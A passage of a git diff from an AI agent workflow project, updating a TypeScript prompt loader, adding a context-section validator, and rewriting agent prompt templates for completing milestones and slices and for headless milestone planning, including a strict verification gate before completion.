+ * Avoids hardcoding `~/.gsd/agent/extensions/gsd/templates/` in templates. (#3575)
+ */
+export function getTemplatesDir(): string {
+  return templatesDir;
+}
+
 // Cache all templates eagerly at module load — a running session uses the
 // template versions that were on disk at startup, immune to later overwrites.
 const templateCache = new Map<string, string>();
@@ -72,7 +81,7 @@ function warmCache(): void {
     // prompts/ may not exist in test environments — lazy loading still works.
     // Emit a diagnostic when running outside tests so wrong-path bugs are visible.
     if (!process.env.VITEST && !process.env.NODE_TEST) {
-      process.stderr.write(`[gsd:prompt-loader] warmCache: prompts dir not found: ${promptsDir}\n`);
+      logWarning("prompt", `warmCache: prompts dir not found: ${promptsDir}`);
     }
   }
 
@@ -87,7 +96,7 @@ function warmCache(): void {
   } catch {
     // templates/ may not exist in test environments — lazy loading still works.
     if (!process.env.VITEST && !process.env.NODE_TEST) {
-      process.stderr.write(`[gsd:prompt-loader] warmCache: templates dir not found: ${templatesDir}\n`);
+      logWarning("prompt", `warmCache: templates dir not found: ${templatesDir}`);
     }
   }
 }
@@ -134,7 +143,10 @@ export function loadPrompt(name: string, vars: Record<string, string> = {}): str
   }
 
   for (const [key, value] of Object.entries(effectiveVars)) {
-    content = content.replaceAll(`{{${key}}}`, value);
+    // Use split/join instead of replaceAll to avoid JavaScript's special
+    // replacement patterns ($', $`, $&) being interpreted in the value.
+    // See: https://github.com/gsd-build/gsd-2/issues/2968
+    content = content.split(`{{${key}}}`).join(value);
   }
 
   return content.trim();
diff --git a/src/resources/extensions/gsd/prompt-validation.ts b/src/resources/extensions/gsd/prompt-validation.ts
new file mode 100644
index 000000000..df2463a98
--- /dev/null
+++ b/src/resources/extensions/gsd/prompt-validation.ts
@@ -0,0 +1,88 @@
+/**
+ * GSD Prompt Validation — Validates enhanced context output before writing.
+ *
+ * Implements R109 validation requirement: CONTEXT.md must have required sections
+ * before being written to disk.
+ */
+
+/**
+ * Result of validating enhanced context output.
+ */
+export interface ValidationResult {
+  /** Whether all required sections are present. */
+  valid: boolean;
+  /** List of missing required sections. */
+  missing: string[];
+}
+
+/**
+ * Validate that enhanced context content has all required sections.
+ *
+ * Required sections per R109:
+ * - Scope section (## Scope, ## Milestone Scope, or ## Why This Milestone)
+ * - Architectural Decisions section (## Architectural Decisions)
+ * - Acceptance Criteria section (## Acceptance Criteria or ## Final Integrated Acceptance)
+ *
+ * Additionally validates that the Architectural Decisions section contains
+ * at least one decision entry (### heading or **Decision marker).
+ *
+ * @param content - The enhanced context markdown content
+ * @returns ValidationResult with valid flag and list of missing sections
+ */
+export function validateEnhancedContext(content: string): ValidationResult {
+  const missing: string[] = [];
+
+  // Required section 1: Scope (multiple acceptable header variants)
+  const hasScopeSection =
+    /^## Scope\b/m.test(content) ||
+    /^## Milestone Scope\b/m.test(content) ||
+    /^## Why This Milestone\b/m.test(content);
+
+  if (!hasScopeSection) {
+    missing.push("Milestone Scope or Why This Milestone");
+  }
+
+  // Required section 2: Architectural Decisions
+  const hasArchitecturalDecisions = /^## Architectural Decisions\b/m.test(content);
+  if (!hasArchitecturalDecisions) {
+    missing.push("Architectural Decisions");
+  }
+
+  // Required section 3: Acceptance Criteria (multiple acceptable header variants)
+  const hasAcceptanceCriteria =
+    /^## Acceptance Criteria\b/m.test(content) ||
+    /^## Final Integrated Acceptance\b/m.test(content);
+
+  if (!hasAcceptanceCriteria) {
+    missing.push("Acceptance Criteria");
+  }
+
+  // Additional validation: Architectural Decisions must have at least one entry
+  if (hasArchitecturalDecisions) {
+    // Extract the section content between ## Architectural Decisions and the next ## heading.
+    // Uses indexOf-based extraction instead of regex with \z (which is invalid in JavaScript
+    // regex — it's PCRE/Ruby syntax and JS treats it as literal 'z').
+    const sectionStart = content.indexOf("## Architectural Decisions");
+    if (sectionStart === -1) {
+      missing.push("Architectural Decisions");
+    } else {
+      const afterHeading = content.slice(sectionStart + "## Architectural Decisions".length);
+      const nextSection = afterHeading.search(/^## /m);
+      const sectionContent = nextSection === -1 ? afterHeading : afterHeading.slice(0, nextSection);
+
+      // Check for actual decision entries:
+      // - ### heading (subsection per decision)
+      // - **Decision marker (inline decision format)
+      const hasDecisionEntry = /^### /m.test(sectionContent) || /^\*\*Decision/m.test(sectionContent);
+
+      if (!hasDecisionEntry) {
+        missing.push("At least one architectural decision entry");
+      }
+    }
+  }
+
+  return {
+    valid: missing.length === 0,
+    missing,
+  };
+}
diff --git a/src/resources/extensions/gsd/prompts/complete-milestone.md b/src/resources/extensions/gsd/prompts/complete-milestone.md
index 23fc9cfa1..ca11b93d7 100644
--- a/src/resources/extensions/gsd/prompts/complete-milestone.md
+++ b/src/resources/extensions/gsd/prompts/complete-milestone.md
@@ -17,20 +17,52 @@ All relevant context has been preloaded below — the roadmap, all slice summari
 Then:
 1. Use the **Milestone Summary** output template from the inlined context above
 2. {{skillActivation}}
-3. **Verify code changes exist.** Run `git diff --stat HEAD $(git merge-base HEAD main) -- ':!.gsd/'` (or the equivalent for the integration branch). If no non-`.gsd/` files appear in the diff, the milestone produced only planning artifacts and no actual code. In that case, do NOT mark the milestone as passing verification — document the gap clearly in the summary and state that implementation is missing.
-4. Verify each **success criterion** from the milestone definition in `{{roadmapPath}}`. For each criterion, confirm it was met with specific evidence from slice summaries, test results, or observable behavior. List any criterion that was NOT met.
-5. Verify the milestone's **definition of done** — all slices are `[x]`, all slice summaries exist, and any cross-slice integration points work correctly.
-6. Validate **requirement status transitions**. For each requirement that changed status during this milestone, confirm the transition is supported by evidence. Requirements can move between Active, Validated, Deferred, Blocked, or Out of Scope — but only with proof.
-7. Write `{{milestoneSummaryPath}}` using the milestone-summary template. Fill all frontmatter fields and narrative sections. The `requirement_outcomes` field must list every requirement that changed status with `from_status`, `to_status`, and `proof`.
-8. Update `.gsd/REQUIREMENTS.md` if any requirement status transitions were validated in step 5.
-9. Update `.gsd/PROJECT.md` to reflect milestone completion and current project state.
-10. Review all slice summaries for cross-cutting lessons, patterns, or gotchas that emerged during this milestone. Append any non-obvious, reusable insights to `.gsd/KNOWLEDGE.md`.
-11. Do not commit manually — the system auto-commits your changes after this unit completes.
+3. **Verify code changes exist.** Run `git diff --stat HEAD $(git merge-base HEAD main) -- ':!.gsd/'` (or the equivalent for the integration branch). If no non-`.gsd/` files appear in the diff, the milestone produced only planning artifacts and no actual code. Record this as a **verification failure**.
+4. Verify each **success criterion** from the milestone definition in `{{roadmapPath}}`. For each criterion, confirm it was met with specific evidence from slice summaries, test results, or observable behavior. Record any criterion that was NOT met as a **verification failure**.
+5. Verify the milestone's **definition of done** — all slices are `[x]`, all slice summaries exist, and any cross-slice integration points work correctly. Record any unmet items as a **verification failure**.
+6. If the roadmap includes a **Horizontal Checklist**, verify each item was addressed during the milestone. Note unchecked items in the milestone summary.
+7. Fill the **Decision Re-evaluation** table in the milestone summary. For each key decision from `.gsd/DECISIONS.md` made during this milestone, evaluate whether it is still valid given what was actually built. Flag decisions that should be revisited next milestone.
+8. Validate **requirement status transitions**. For each requirement that changed status during this milestone, confirm the transition is supported by evidence. Requirements can move between Active, Validated, Deferred, Blocked, or Out of Scope — but only with proof.
 
-**Important:** Do NOT skip the code change verification, success criteria, or definition of done verification (steps 3-5). The milestone summary must reflect actual verified outcomes, not assumed success. If any criterion was not met or no code changes exist, document it clearly in the summary and do not mark the milestone as passing verification.
+**DB access safety:** Do NOT query `.gsd/gsd.db` directly via `sqlite3` or `node -e require('better-sqlite3')` — the engine owns the WAL connection. Use `gsd_milestone_status` to read milestone and slice state. All data you need is already inlined in the context above or accessible via the `gsd_*` tools — never via direct SQL.
+
+### Verification Gate — STOP if verification failed
+
+**If ANY verification failure was recorded in steps 3, 4, or 5, you MUST follow the failure path below. Do NOT proceed to step 10.**
+
+**Failure path** (verification failed):
+- Do NOT call `gsd_complete_milestone` — the milestone must not be marked as complete.
+- Do NOT update `.gsd/PROJECT.md` to reflect completion.
+- Do NOT update `.gsd/REQUIREMENTS.md` to mark requirements as validated.
+- Write a clear summary of what failed and why to help the next attempt.
+- Say: "Milestone {{milestoneId}} verification FAILED — not complete." and stop.
+
+**Success path** (all verifications passed — continue with steps 9–13):
+
+9. For each requirement whose status changed in step 8, call `gsd_requirement_update` with the requirement ID and updated `status` and `validation` fields — the tool regenerates `.gsd/REQUIREMENTS.md` automatically. Do this BEFORE completing the milestone so requirement updates are persisted.
+10. **Persist completion through `gsd_complete_milestone`.** Call it with the parameters below. The tool updates the milestone status in the DB, renders `{{milestoneSummaryPath}}`, and validates all slices are complete before proceeding.
+
+   **Required parameters:**
+   - `milestoneId` (string) — Milestone ID (e.g. M001)
+   - `title` (string) — Milestone title
+   - `oneLiner` (string) — One-sentence summary of what the milestone achieved
+   - `narrative` (string) — Detailed narrative of what happened during the milestone
+   - `successCriteriaResults` (string) — Markdown detailing how each success criterion was met or not met
+   - `definitionOfDoneResults` (string) — Markdown detailing how each definition-of-done item was met
+   - `requirementOutcomes` (string) — Markdown detailing requirement status transitions with evidence
+   - `keyDecisions` (array of strings) — Key architectural/pattern decisions made during the milestone
+   - `keyFiles` (array of strings) — Key files created or modified during the milestone
+   - `lessonsLearned` (array of strings) — Lessons learned during the milestone
+   - `verificationPassed` (boolean) — Must be `true` — confirms that code change verification, success criteria, and definition of done checks all passed before completion
+
+   **Optional parameters:**
+   - `followUps` (string) — Follow-up items for future milestones
+   - `deviations` (string) — Deviations from the original plan
+11. Update `.gsd/PROJECT.md`: use the `write` tool with `path: ".gsd/PROJECT.md"` and `content` containing the full updated document reflecting milestone completion and current project state. Do NOT use the `edit` tool for this — PROJECT.md is a full-document refresh.
+12. Review all slice summaries for cross-cutting lessons, patterns, or gotchas that emerged during this milestone. Append any non-obvious, reusable insights to `.gsd/KNOWLEDGE.md`.
+13. Do not commit manually — the system auto-commits your changes after this unit completes.
+- Say: "Milestone {{milestoneId}} complete."
+
+**Important:** Do NOT skip the code change verification, success criteria, or definition of done verification (steps 3-5). The milestone summary must reflect actual verified outcomes, not assumed success. Verification failures BLOCK completion — there is no override. The milestone stays in its current state until issues are resolved and verification is re-run. **If a verification tool itself fails, errors, or returns unexpected output, treat it as a verification failure** — never rationalize past a tool error ("tool didn't respond, assuming success" is forbidden). A tool that cannot verify is a tool that did not verify.
 
 **File system safety:** When scanning milestone directories for evidence, use `ls` or `find` to list directory contents first — never pass a directory path (e.g. `tasks/`, `slices/`) directly to the `read` tool. The `read` tool only accepts file paths, not directories.
-
-**You MUST write `{{milestoneSummaryPath}}` AND update PROJECT.md before finishing.**
-
-When done, say: "Milestone {{milestoneId}} complete."
diff --git a/src/resources/extensions/gsd/prompts/complete-slice.md b/src/resources/extensions/gsd/prompts/complete-slice.md
index b001ace02..86c271298 100644
--- a/src/resources/extensions/gsd/prompts/complete-slice.md
+++ b/src/resources/extensions/gsd/prompts/complete-slice.md
@@ -23,15 +23,20 @@ Then:
 2. {{skillActivation}}
 3. Run all slice-level verification checks defined in the slice plan. All must pass before marking the slice done. If any fail, fix them first.
 4. If the slice plan includes observability/diagnostic surfaces, confirm they work. Skip this for simple slices that don't have observability sections.
-5. If `.gsd/REQUIREMENTS.md` exists, update it based on what this slice actually proved. Move requirements between Active, Validated, Deferred, Blocked, or Out of Scope only when the evidence from execution supports that change.
-6. Write `{{sliceSummaryPath}}` (compress all task summaries).
-7. Write `{{sliceUatPath}}` — a concrete UAT script with real test cases derived from the slice plan and task summaries. Include preconditions, numbered steps with expected outcomes, and edge cases. This must NOT be a placeholder or generic template — tailor every test case to what this slice actually built.
-8. Review task summaries for `key_decisions`. Append any significant decisions to `.gsd/DECISIONS.md` if missing.
-9. Review task summaries for patterns, gotchas, or non-obvious lessons learned. If any would save future agents from repeating investigation or hitting the same issues, append them to `.gsd/KNOWLEDGE.md`. Only add entries that are genuinely useful — don't pad with obvious observations.
-10. Mark {{sliceId}} done in `{{roadmapPath}}` (change `[ ]` to `[x]`)
-11. Do not run git commands — the system commits your changes and handles any merge after this unit succeeds.
-12. Update `.gsd/PROJECT.md` if it exists — refresh current state if needed.
+5. If the slice involved runtime behavior, fill the **Operational Readiness** section (Q8) in the slice summary: health signal, failure signal, recovery procedure, and monitoring gaps. Omit entirely for simple slices with no runtime concerns.
+6. If this slice produced evidence that a requirement changed status (Active → Validated, Active → Deferred, etc.), call `gsd_requirement_update` with the requirement ID, updated `status`, and `validation` evidence. Do NOT write `.gsd/REQUIREMENTS.md` directly — the engine renders it from the database.
+7. Prepare the slice completion content you will pass to `gsd_complete_slice` using the camelCase fields `milestoneId`, `sliceId`, `sliceTitle`, `oneLiner`, `narrative`, `verification`, and `uatContent`. Do **not** manually write `{{sliceSummaryPath}}`. Do **not** manually write `{{sliceUatPath}}` — the DB-backed tool is the canonical write path for both artifacts.
+8. Draft the UAT content you will pass as `uatContent` — a concrete UAT script with real test cases derived from the slice plan and task summaries. Include preconditions, numbered steps with expected outcomes, and edge cases. This must NOT be a placeholder or generic template — tailor every test case to what this slice actually built.
+9. Review task summaries for `key_decisions`. Append any significant decisions to `.gsd/DECISIONS.md` if missing.
+10. Review task summaries for patterns, gotchas, or non-obvious lessons learned. If any would save future agents from repeating investigation or hitting the same issues, append them to `.gsd/KNOWLEDGE.md`. Only add entries that are genuinely useful — don't pad with obvious observations.
+11. Call `gsd_complete_slice` with the camelCase fields `milestoneId`, `sliceId`, `sliceTitle`, `oneLiner`, `narrative`, `verification`, and `uatContent`, plus any optional enrichment fields you have. Do NOT manually mark the roadmap checkbox — the tool writes to the DB, renders `{{sliceSummaryPath}}` and `{{sliceUatPath}}`, and updates the ROADMAP.md projection automatically.
+12. Do not run git commands — the system commits your changes and handles any merge after this unit succeeds.
+13. Update `.gsd/PROJECT.md` if it exists — refresh current state if needed: use the `write` tool with `path: ".gsd/PROJECT.md"` and `content` containing the full updated document reflecting current project state. Do NOT use the `edit` tool for this — PROJECT.md is a full-document refresh.
 
-**You MUST do ALL THREE before finishing: (1) write `{{sliceSummaryPath}}`, (2) write `{{sliceUatPath}}`, (3) mark {{sliceId}} as `[x]` in `{{roadmapPath}}`. The unit will not be marked complete if any of these files are missing.**
+**Autonomous execution:** Do not call `ask_user_questions` or `secure_env_collect`. You are running in auto-mode — there is no human available to answer questions. Make reasonable assumptions and document them in the slice summary. If a decision genuinely requires human input, note it in the summary and proceed with the best available option.
+
+**File system safety:** Task summaries are preloaded in the inlined context above. If you need to re-read any of them, use `find .gsd/milestones/{{milestoneId}}/slices/{{sliceId}}/tasks -name "*-SUMMARY.md"` to list file paths first — never pass `{{slicePath}}` or any other directory path directly to the `read` tool. The `read` tool only accepts file paths, not directories.
+
+**You MUST call `gsd_complete_slice` with the slice summary and UAT content before finishing. The tool persists to both DB and disk and renders `{{sliceSummaryPath}}` and `{{sliceUatPath}}` automatically.**
 
 When done, say: "Slice {{sliceId}} complete."
diff --git a/src/resources/extensions/gsd/prompts/discuss-headless.md b/src/resources/extensions/gsd/prompts/discuss-headless.md
index 9de3bcd2a..ddd10d454 100644
--- a/src/resources/extensions/gsd/prompts/discuss-headless.md
+++ b/src/resources/extensions/gsd/prompts/discuss-headless.md
@@ -1,86 +1,253 @@
 # Headless Milestone Creation
 
-You are creating a GSD milestone from a provided specification document. This is a **headless** (non-interactive) flow — do NOT ask the user any questions. Work entirely from the provided specification.
+You are creating a GSD milestone from a provided specification document. This is a **headless** (non-interactive) flow — do NOT ask the user any questions. Wherever the interactive flow would ask the user, make your best-judgment call and document it as an assumption.
 
 ## Provided Specification
 
 {{seedContext}}
 
-## Your Task
+## Reflection Step
 
-### Step 1: Reflect
+Summarize your understanding of the specification concretely — not abstractly:
 
-Summarize your understanding of the specification concretely:
-- What is being built
-- Major capabilities/features
-- Scope estimate (how many milestones × slices)
-- Any ambiguities or gaps you notice
+1. Summarize what is being built in your own words.
+2. Give an honest size read: roughly how many milestones, roughly how many slices in the first one. Base this on the actual work involved, not a classification label.
+3. Include scope honesty — a bullet list of the major capabilities: "Here's what I'm reading from the spec: [bullet list of major capabilities]."
+4. Note any ambiguities, gaps, or areas where the spec is vague.
 
-### Step 2: Investigate (brief)
+Print this reflection in chat. Do not skip this step.
 
-Quickly scout the codebase to understand what already exists — spend no more than 5-6 tool calls here:
-- `ls` the project root and key directories
-- Search for relevant existing code, patterns, dependencies
-- Check library docs if needed (`resolve_library` / `get_library_docs`)
+## Vision Mapping
 
-Then move on to writing artifacts. Do not explore exhaustively — the research phase will do deeper investigation later.
+Decide the approach based on the actual scope:
 
-### Step 3: Make Decisions
+**If the work spans multiple milestones:** Map the full landscape:
+1. Propose a milestone sequence — names, one-line intents, rough dependencies
+2. Print this in chat as the working milestone sequence
 
-For any ambiguities or gaps in the specification:
-- Make your best-guess decision based on the spec's intent, codebase patterns, and domain conventions
-- Document each assumption clearly in the Context file
+**If the work fits in a single milestone:** Proceed directly to investigation.
 
-### Step 4: Assess Scope
+**Anti-reduction rule:** If the spec describes a big vision, plan the big vision. Do not reduce scope. Phase complex/risky work into later milestones — do not cut it. The spec's ambition is the target, and your job is to sequence it intelligently, not shrink it.
 
-Based on reflection + investigation:
-- Is this a single milestone or multiple milestones?
-- If multi-milestone: plan the full sequence with dependencies
+## Mandatory Investigation
 
-### Step 5: Write Artifacts
+Do a mandatory investigation pass before making any decisions. This is not optional.
 
-**Milestone ID**: {{milestoneId}}
+1. **Scout the codebase** — `ls`, `find`, `rg`, or `scout` for broad unfamiliar areas. Understand what already exists, what patterns are established, what constraints current code imposes.
+2. **Check library docs** — `resolve_library` / `get_library_docs` for any tech mentioned in the spec. Get current facts about capabilities, constraints, API shapes, version-specific behavior.
+3. **Web search** — `search-the-web` if the domain is unfamiliar, if you need current best practices, or if the spec references external services/APIs you need facts about. Use `fetch_page` for full content when snippets aren't enough.
 
-Use these templates exactly:
+**Web search budget:** Budget carefully across investigation + focused research:
+- Prefer `resolve_library` / `get_library_docs` over `search-the-web` for library documentation.
+- Prefer `search_and_read` for one-shot topic research.
+- Target 2-3 web searches in this investigation pass. Save remaining budget for focused research.
+- Do NOT repeat the same or similar queries.
 
-{{inlinedTemplates}}
+The goal: your decisions should reflect what's actually true in the codebase and ecosystem, not what you assume.
 
-**For single milestone**, write in this order:
+## Autonomous Decision-Making
+
+For every area where the spec is ambiguous, vague, or silent:
+
+- Apply the depth checklist (below) to identify what needs resolution
+- Make your best-judgment call based on: the spec's intent, codebase patterns, domain conventions, and investigation findings
+- **Document every assumption** in the Context file under an "Assumptions" section
+- For each assumption, note: what the spec said (or didn't say), what you decided, and why
+
+### Depth Checklist
+
+Ensure ALL of these are resolved before writing artifacts — from the spec + investigation, not by asking:
+
+- [ ] **What is being built** — concrete enough that you could explain it to a stranger
+- [ ] **Why it needs to exist** — the problem it solves or the desire it fulfills
+- [ ] **Who it's for** — even if just the spec author
+- [ ] **What "done" looks like** — observable outcomes, not abstract goals
+- [ ] **The biggest technical unknowns / risks** — what could fail, what hasn't been proven
+- [ ] **What external systems/services this touches** — APIs, databases, third-party services, hardware
+
+If the spec leaves any of these unresolved, make your best-judgment call and document it.
+
+## Depth Verification
+
+Print a structured depth summary in chat covering:
+- What you understood the spec to describe
+- Key technical findings from investigation
+- Assumptions you made and why
+- Areas where you're least confident
+
+This is your audit trail. Print it — do not skip it.
+
+## Focused Research
+
+Do a focused research pass before roadmap creation.
+
+Research is advisory, not auto-binding. Use the spec + investigation to identify:
+- table stakes the product space usually expects
+- domain-standard behaviors that may be implied but not stated
+- likely omissions that would make the product feel incomplete
+- plausible anti-features or scope traps
+- differentiators worth preserving
+
+For multi-milestone visions, research should cover the full landscape, not just the first milestone. Research findings may affect milestone sequencing, not just slice ordering within M001.
+
+**Key difference from interactive flow:** Where the interactive flow would present research-surfaced candidate requirements for the user to confirm/defer/reject, you instead apply your best judgment. If a research finding clearly aligns with the spec's intent, include it. If it's tangential or would expand scope beyond what the spec describes, defer it or mark it out of scope. Document the reasoning.
+
+## Capability Contract
+
+Before writing a roadmap, produce `.gsd/REQUIREMENTS.md`.
+
+Use it as the project's explicit capability contract.
+
+Requirements must be organized into:
+- Active
+- Validated
+- Deferred
+- Out of Scope
+- Traceability
+
+Each requirement should include:
+- stable ID (`R###`)
+- title
+- class
+- status
+- description
+- why it matters
+- source (`spec`, `inferred`, `research`, or `execution`)
+- primary owning slice
+- supporting slices
+- validation status
+- notes
+
+Rules:
+- Keep requirements capability-oriented, not a giant feature inventory
+- Every Active requirement must either be mapped to a roadmap owner, explicitly deferred, blocked with reason, or moved out of scope
+- Product-facing work should capture launchability, primary user loop, continuity, and failure visibility when relevant
+- Later milestones may have provisional ownership, but the first planned milestone should map requirements to concrete slices wherever possible
+
+For multi-milestone projects, requirements should span the full vision. Requirements owned by later milestones get provisional ownership. The full requirement set captures the spec's complete vision — milestones are the sequencing strategy, not the scope boundary.
+
+**Print the requirements in chat before writing the roadmap.** Print a markdown table with columns: ID, Title, Status, Owner, Source. Group by status (Active, Deferred, Out of Scope).
+
+## Scope Assessment
+
+Confirm the size estimate from your reflection still holds. Investigation and research often reveal hidden complexity or simplify things. If the scope grew or shrank significantly, adjust the milestone and slice counts accordingly.
+
+## Output Phase
+
+### Roadmap Preview
+
+Before writing any files, **print the planned roadmap in chat**. Print a markdown table with columns: Slice, Title, Risk, Depends, Demo. One row per slice. Below the table, print the milestone definition of done as a bullet list.
+
+This is the user's audit trail in the TUI scrollback — do not skip it.
+
+### Naming Convention
+
+Directories use bare IDs. Files use ID-SUFFIX format. Titles live inside file content, not in names.
+- Milestone dir: `.gsd/milestones/{{milestoneId}}/`
+- Milestone files: `{{milestoneId}}-CONTEXT.md`, `{{milestoneId}}-ROADMAP.md`
+- Slice dirs: `S01/`, `S02/`, etc.
+
+### Single Milestone
+
+In a single pass:
 1. `mkdir -p .gsd/milestones/{{milestoneId}}/slices`
-2. Write `.gsd/PROJECT.md` (using Project template)
-3. Write `.gsd/REQUIREMENTS.md` (using Requirements template)
-4. Write `{{contextPath}}` (using Context template) — preserve the specification's exact terminology, emphasis, and specific framing. Do not paraphrase domain-specific language into generics. Document assumptions under an "Assumptions" section.
-5. Write `{{roadmapPath}}` (using Roadmap template) — decompose into demoable vertical slices with checkboxes, risk, depends, demo sentences, proof strategy, verification classes, milestone definition of done, requirement coverage, and a boundary map. If the milestone crosses multiple runtime boundaries, include an explicit final integration slice.
-6. Seed `.gsd/DECISIONS.md` (using Decisions template)
+2. Write or update `.gsd/PROJECT.md` — use the **Project** output template below. Describe what the project is, its current state, and list the milestone sequence.
+3. Write or update `.gsd/REQUIREMENTS.md` — use the **Requirements** output template below. Confirm requirement states, ownership, and traceability before roadmap creation.
+
+**Depth-Preservation Guidance for context.md:**
+Preserve the specification's exact terminology, emphasis, and specific framing. Do not paraphrase domain-specific language into generics. If the spec said "craft feel," write "craft feel" — not "high-quality user experience." The context file is downstream agents' only window into this conversation — flattening specifics into generics loses the signal that shaped every decision.
+
+4. Write `{{contextPath}}` — use the **Context** output template below. Preserve key risks, unknowns, existing codebase constraints, integration points, and relevant requirements surfaced during research. Include an "Assumptions" section documenting every judgment call.
+5. Call `gsd_plan_milestone` to create the roadmap. Decompose into demoable vertical slices with risk, depends, demo sentences, proof strategy, verification classes, milestone definition of done, requirement coverage, and a boundary map. If the milestone crosses multiple runtime boundaries, include an explicit final integration slice that proves the assembled system works end-to-end in a real environment. Use the **Roadmap** output template below to structure the tool call parameters.
+6. For each architectural or pattern decision, call `gsd_decision_save` — the tool auto-assigns IDs and regenerates `.gsd/DECISIONS.md` automatically.
 7. {{commitInstruction}}
-9. Say exactly: "Milestone {{milestoneId}} ready."
 
-**For multi-milestone**, write in this order:
+After writing the files, say exactly: "Milestone {{milestoneId}} ready." — nothing else. Auto-mode will start automatically.
+
+### Multi-Milestone
+
+#### Phase 1: Shared artifacts
+
 1. For each milestone, call `gsd_milestone_generate_id` to get its ID — never invent milestone IDs manually. Then `mkdir -p .gsd/milestones/<ID>/slices` for each.
-2. Write `.gsd/PROJECT.md` — full vision across ALL milestones (using Project template)
-3. Write `.gsd/REQUIREMENTS.md` — full capability contract (using Requirements template)
-4. Seed `.gsd/DECISIONS.md` (using Decisions template)
-5. Write PRIMARY `{{contextPath}}` — full context with all assumptions documented
-6. Write PRIMARY `{{roadmapPath}}` — detailed slices for the first milestone only
-7. For each remaining milestone, write full CONTEXT.md with `depends_on` frontmatter:
-   ```yaml
-   ---
-   depends_on: [M001, M002]
-   ---
+2. Write `.gsd/PROJECT.md` — use the **Project** output template below.
+3. Write `.gsd/REQUIREMENTS.md` — use the **Requirements** output template below. Capture Active, Deferred, Out of Scope, and any already Validated requirements. Later milestones may have provisional ownership where slice plans do not exist yet.
+4. For any architectural or pattern decisions, call `gsd_decision_save` — the tool auto-assigns IDs and regenerates `.gsd/DECISIONS.md` automatically.
 
-   # M003: Title
-   ```
-   Each context file should be rich enough that a future agent — with no memory of this conversation — can understand the intent, constraints, dependencies, what the milestone unlocks, and what "done" looks like.
-8. {{multiMilestoneCommitInstruction}}
-10. Say exactly: "Milestone {{milestoneId}} ready."
+#### Phase 2: Primary milestone
+
+5. Write a full `CONTEXT.md` for the primary milestone (the first in sequence). Include an "Assumptions" section.
+6. Call `gsd_plan_milestone` for **only the primary milestone** — detail-planning later milestones now is waste because the codebase will change. Include requirement coverage and a milestone definition of done.
+
+#### MANDATORY: depends_on Frontmatter in CONTEXT.md
+
+Every CONTEXT.md for a milestone that depends on other milestones MUST have YAML frontmatter with `depends_on`. The auto-mode state machine reads this field to determine execution order — without it, milestones may execute out of order or in parallel when they shouldn't.
+
+```yaml
+---
+depends_on: [M001, M002]
+---
+
+# M003: Title
+```
+
+If a milestone has no dependencies, omit the frontmatter. Do NOT rely on QUEUE.md or PROJECT.md for dependency tracking — the state machine only reads CONTEXT.md frontmatter.
+
+#### Phase 3: Remaining milestones
+
+For each remaining milestone, in dependency order, autonomously decide the best readiness mode:
+
+- **Write full context** — if the spec provides enough detail for this milestone and investigation confirms feasibility. Write a full `CONTEXT.md` with technical assumptions verified against the actual codebase.
+- **Write draft for later** — if the spec has seed material but the milestone needs its own investigation/research in a future session. Write a `CONTEXT-DRAFT.md` capturing seed material, key ideas, provisional scope, and open questions. **Downstream:** Auto-mode pauses at this milestone and prompts the user to discuss.
+- **Just queue it** — if the milestone is identified but the spec provides no actionable detail. No context file written. **Downstream:** Auto-mode pauses and starts a full discussion from scratch.
+
+**Default to writing full context** when the spec is detailed enough. Default to draft when the spec mentions the milestone but is vague. Default to queue when the milestone is implied by the vision but not described.
+
+**Technical Assumption Verification is still MANDATORY** for full-context milestones:
+1. Read the actual code for every file or module you reference. Confirm APIs exist, check what functions actually do.
+2. Check for stale assumptions — verify referenced modules still work as described.
+3. Print findings in chat before writing each milestone's CONTEXT.md.
+
+Each context file (full or draft) should be rich enough that a future agent encountering it fresh — with no memory of this conversation — can understand the intent, constraints, dependencies, what this milestone unlocks, and what "done" looks like.
+
+#### Milestone Gate Tracking (MANDATORY for multi-milestone)
+
+After deciding each milestone's readiness, immediately write or update `.gsd/DISCUSSION-MANIFEST.json`:
+
+```json
+{
+  "primary": "M001",
+  "milestones": {
+    "M001": { "gate": "discussed", "context": "full" },
+    "M002": { "gate": "discussed", "context": "full" },
+    "M003": { "gate": "queued",    "context": "none" }
+  },
+  "total": 3,
+  "gates_completed": 3
+}
+```
+
+Write this file AFTER each gate decision, not just at the end. Update `gates_completed` incrementally. The system reads this file and BLOCKS auto-start if `gates_completed < total`.
+
+For single-milestone projects, do NOT write this file.
+
+#### Phase 4: Finalize
+
+7. {{multiMilestoneCommitInstruction}}
+
+After writing the files, say exactly: "Milestone {{milestoneId}} ready." — nothing else. Auto-mode will start automatically.
 
 ## Critical Rules
 
-- **DO NOT ask the user any questions** — this is headless mode
+- **DO NOT ask the user any questions** — this is headless mode. Make judgment calls and document them.
 - **Preserve the specification's terminology** — don't paraphrase domain-specific language
-- **Document assumptions** — when you make a judgment call, note it in CONTEXT.md under "Assumptions"
-- **Investigate before writing** — always scout the codebase first
-- **Use depends_on frontmatter** for multi-milestone sequences (the state machine reads this field to determine execution order)
-- **Anti-reduction rule** — if the spec describes a big vision, plan the big vision. Do not ask "what's the minimum viable version?" or reduce scope. Phase complex/risky work into later milestones — do not cut it.
-- **Naming convention** — always use `gsd_milestone_generate_id` to get milestone IDs. Directories use bare IDs (e.g. `M001/` or `M001-r5jzab/`), files use ID-SUFFIX format (e.g. `M001-CONTEXT.md` or `M001-r5jzab-CONTEXT.md`). Never invent milestone IDs manually.
+- **Document assumptions** — every judgment call gets noted in CONTEXT.md under "Assumptions" with reasoning
+- **Investigate thoroughly** — scout codebase, check library docs, web search. Same rigor as interactive mode.
+- **Do focused research** — identify table stakes, domain standards, omissions, scope traps. Same rigor as interactive mode.
+- **Use proper tools** — `gsd_plan_milestone` for roadmaps, `gsd_decision_save` for decisions, `gsd_milestone_generate_id` for IDs
+- **Print artifacts in chat** — requirements table, roadmap preview, depth summary. The TUI scrollback is the user's audit trail.
+- **Use depends_on frontmatter** for multi-milestone sequences
+- **Anti-reduction rule** — if the spec describes a big vision, plan the big vision. Phase complexity — don't cut it.
+- **Naming convention** — always use `gsd_milestone_generate_id` for IDs. Directories use bare IDs, files use ID-SUFFIX format.
 - **End with "Milestone {{milestoneId}} ready."** — this triggers auto-start detection
+
+{{inlinedTemplates}}
diff --git a/src/resources/extensions/gsd/prompts/discuss-prepared.md b/src/resources/extensions/gsd/prompts/discuss-prepared.md
new file mode 100644
index 000000000..92a232f7b
--- /dev/null
+++ b/src/resources/extensions/gsd/prompts/discuss-prepared.md
@@ -0,0 +1,424 @@
+{{preamble}}
+
+You are conducting a **prepared discussion** — the system has already analyzed the codebase, gathered prior context, and researched the ecosystem. Your job is to present these findings, make recommendations, and gather the user's input through a structured 4-layer protocol.
+
